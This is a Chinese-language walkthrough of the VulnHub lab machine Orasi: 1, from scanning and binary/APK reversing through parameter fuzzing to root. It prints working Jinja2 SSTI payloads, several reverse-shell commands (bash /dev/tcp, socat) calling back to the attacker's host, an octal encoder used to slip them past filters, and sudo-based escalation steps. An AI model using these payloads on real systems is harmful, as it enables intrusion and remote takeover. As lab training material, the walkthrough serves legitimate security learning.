攻击机:虚拟机kali、本机win10。
靶机:Orasi: 1,下载地址:https://download.vulnhub.com/orasi/Orasi.ova,下载后直接vbox打开即可。
知识点:hex编码、ida逆向、AndroidKiller逆向、ffuf爆破、ssti漏洞、shell反弹、敏感信息发现、信息利用。
隐藏信息:Hint : just one useless little dot,在下载时发现的。
使用nmap扫描下靶机地址,命令:nmap -sn 192.168.5.0/24,发现靶机地址:192.168.5.156。
使用nmap扫描下端口对应的服务:nmap -T4 -sV -p- -A 192.168.5.156,显示开放了21端口、22端口、80端口、5000端口,开启了ftp服务、ssh服务、http服务。其中ftp服务显示允许匿名登录。
使用nmap获得的信息匿名登录ftp服务,命令:ftp 192.168.5.156,登录到ftp服务后发现一个url文件,将该文件下载到本地。
执行下载的url文件,返回信息,告诉我们有些事情不太明显,将文件复制到本地使用ida进行逆向,但是查看其伪代码时未发现可以利用的信息。
Sometimes things are not obvious Element found: 36
#逆向的伪代码 int __cdecl main(int argc, const char **argv, const char **envp) { init = (__int64)malloc(8uLL); *(_BYTE *)init = 111; *(_DWORD *)(init + 4) = -1; insert(1LL, 47LL); insert(2LL, 115LL); insert(42LL, 104LL); insert(4LL, 52LL); insert(12LL, 100LL); insert(14LL, 48LL); insert(17LL, 119LL); insert(18LL, 36LL); insert(19LL, 115LL); puts("Sometimes things are not obvious"); item = search(18LL); if ( item ) printf("Element found: %d\n", (unsigned int)*(char *)item); else puts("Element not found"); return 0; }
习惯了先看伪代码,但是这里没发现什么有用的信息,后面在程序逻辑图(ida view-1)中发现其寄存器的值连起来是:/sh4d0w$s,猜测是一个目录信息。
访问下80端口和5000端口的web服务并分别访问下/sh4d0w$s目录,在http://192.168.5.156/得到一组信息:6 6 1337leet,暂时不知道作用,在http://192.168.5.156:5000/sh4d0w$s得到提示信息:not input,告诉我们缺少输入。
那就直接使用ffuf进行爆破,命令:ffuf -w /usr/share/SecLists/Discovery/Web-Content/common.txt -u 'http://192.168.5.156:5000/sh4d0w\$s?FUZZ=../../../../../etc/passwd' -fs 8,但是未爆破出来。
后面想到在http://192.168.5.156/得到一组信息:6 6 1337leet,这里想了一下应该是告诉我们参数是6位,由1337leet中的六位组成的意思,后面想到了字典生成工具crunch,那就生成一个字典,命令:crunch 6 6 1337leet > cs.txt,然后继续使用ffuf进行爆破,最后成功获得参数:l333tt。
在http://192.168.5.156:5000/sh4d0w$s页面传递l333tt参数为id,http://192.168.5.156:5000/sh4d0w$s?l333tt=id,但是返回了传入的值,未进行执行。
测试下是否是ssti注入漏洞,将传递的id修改为:{{3*3}},发现3*3被执行,因此这里存在ssti注入漏洞。
在网上查找下ssti注入可以利用的语句,然后进行访问看是否可以正常执行我们输入的命令。
{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("id").read().zfill(417)}}{%endif%}{% endfor %}
现在可以执行我们的命令了那我们就直接进行shell反弹,这里需要对shell反弹语句进行编码,然后在靶机中开启对6688端口的监听,然后访问:http://192.168.5.156:5000/sh4d0w$s?l333tt={%%20for%20x%20in%20().__class__.__base__.__subclasses__()%20%}{%%20if%20%22warning%22%20in%20x.__name__%20%}{{x()._module.__builtins__[%27__import__%27](%27os%27).popen(%22\142\141\163\150\40\55\143\40\47\142\141\163\150\40\55\151\40\76\46\40\57\144\145\166\57\164\143\160\57\61\71\62\56\61\66\70\56\65\56\61\65\60\57\66\66\70\70\40\60\76\46\61\47%20%22).read().zfill(417)}}{%endif%}{%%20endfor%20%}即可获得shell权限。
#字符编码代码,替换下strings即可,后面还要用到这个 oct_result,dec_result,hex_result,bin_result = '','','','' strings = "import os;os.system('/bin/bash -i');" #bash -i >& /dev/tcp/192.168.5.150/6688 0>&1 for string in strings: one_char = ord(string) dec_result = dec_result + str(one_char) + ' ' oct_result = oct_result + str(oct(one_char).replace('0o','\\')) hex_result = hex_result + hex(one_char).replace('0x','') bin_result = bin_result + bin(one_char) + ' ' print('十进制数据:' + dec_result) print('八进制数据:' + oct_result) print('十六进制数据:' + hex_result) print('二进制数据:' + bin_result)
#原语句 {% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("bash -c 'bash -i >&/dev/tcp/192.168.5.150/6688 0>&1'").read().zfill(417)}}{%endif%}{% endfor %} #shell反弹语句编码后的语句 {% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("\142\141\163\150\40\55\143\40\47\142\141\163\150\40\55\151\40\76\46\40\57\144\145\166\57\164\143\160\57\61\71\62\56\61\66\70\56\65\56\61\65\60\57\66\66\70\70\40\60\76\46\61\47 ").read().zfill(417)}}{%endif%}{% endfor %}
使用sudo -l查看下当前账户是否存在可以使用的特权命令,发现存在:(kori) NOPASSWD: /bin/php /home/kori/jail.php *。
分析下jail.php文件,使用exec执行了我们输入的参数,但是对参数进行了过滤,不能出现|bash|eval|nc|whoami等字符。
<?php array_shift($_SERVER['argv']); $var = implode(" ", $_SERVER['argv']); if($var == null) die("Orasis Jail, argument missing\n"); function filter($var) { if(preg_match('/(`|bash|eval|nc|whoami|open|pass|require|include|file|system|\/)/i', $var)) { return false; } return true; } if(filter($var)) { $result = exec($var); echo "$result\n"; echo "Command executed"; } else { echo "Restricted characters has been used"; } echo "\n"; ?>
开始使用下面几个要么能连但是权限不对,要不就连上之后无法执行命令,接着换shell语句尝试,最后发现socat TCP:192.168.5.150:8899 EXEC:sh可以,然后获得新的shell权限并成功提权到kori权限。
#出现问题 sudo -u kori /bin/php /home/kori/jail.php sh -i >& /dev/tcp/192.168.5.150/8899 0>&1 sudo -u kori /bin/php /home/kori/jail.php 0<&196;exec 196<>/dev/tcp/192.168.5.150/88991; sh <&196 >&196 2>&196 #最后发现这个可以 sudo -u kori /bin/php /home/kori/jail.php socat TCP:192.168.5.150:8899 EXEC:sh
继续使用sudo -l查看下当前账户是否存在可以使用的特权命令,发现存在:(irida) NOPASSWD: /usr/bin/cp /home/irida/irida.apk /home/kori/irida.apk。
那就直接将该apk文件复制到/home/kori目录下,命令:sudo -u irida /usr/bin/cp /home/irida/irida.apk /home/kori/irida.apk,但是显示不被允许。
这里应该是irida账户缺少对kori目录的写入权限,那我们就赋予irida账户写入权限,命令chmond o+w /home/kori,然后建立一个irida.apk文件,命令:touch irida.apk,然后赋予777权限,不然复制的文件还是缺少权限,然后将该文件复制过来,命令:sudo -u irida /usr/bin/cp /home/irida/irida.apk /home/kori/irida.apk。
在靶机中开启http服务:python3 -m http.server,将apk文件下载到本地,然后使用AndroidKiller进行逆向分析。使用AndroidKiller工具时需要安装java环境并且需要替换下*\AndroidKiller\bin\apktool\apktool目录下的文件并修改apktool.bat、apktool.ini的指向,不然无法逆向时会失败。替换的文件地址:链接:https://pan.baidu.com/s/1QEM6bYkcHLPtz6PkFlwC5Q,提取码:upfn。
在找到的文件中右键查看-查看源码中观察源码信息,代码的意思是:传入了1#2#3#4#5,然后以#进行拆分,然后对五个参数赋值,再然后通过.将五个参数连接起来,结果就是:eye.of.the.tiger.()。
直接使用eye.of.the.tiger.()作为密码来切换到irida账户时会报错,这时想起来开始在下载页面看到的提示信息:Hint : just one useless little dot,告诉我们只有一个无用的点,那我们依次尝试,最后发现正确的密码是:eye.of.the.tiger(),然后成功切换到irida账户。
获得irida账户权限后在/home/irida目录下读取user.txt文件,成功获得flag值。
继续使用sudo -l查看下当前账户是否存在可以使用的特权命令,发现存在:(root) NOPASSWD: /usr/bin/python3 /root/oras.py。
那我们就直接运行下/root/oras.py文件,命令:sudo /usr/bin/python3 /root/oras.py,随便输入参数,回显告诉我们要输入hexstr。
那我们随便输入一个hex字符:69进行测试,根据报错信息我们得知执行的是exec函数。
那就将import os;os.system("/bin/bash -i");代码进行hash编码,然后输入执行,成功提权到root账户。
获得root权限后在/root目录下发现root.txt文件,读取该文件成功获得flag值。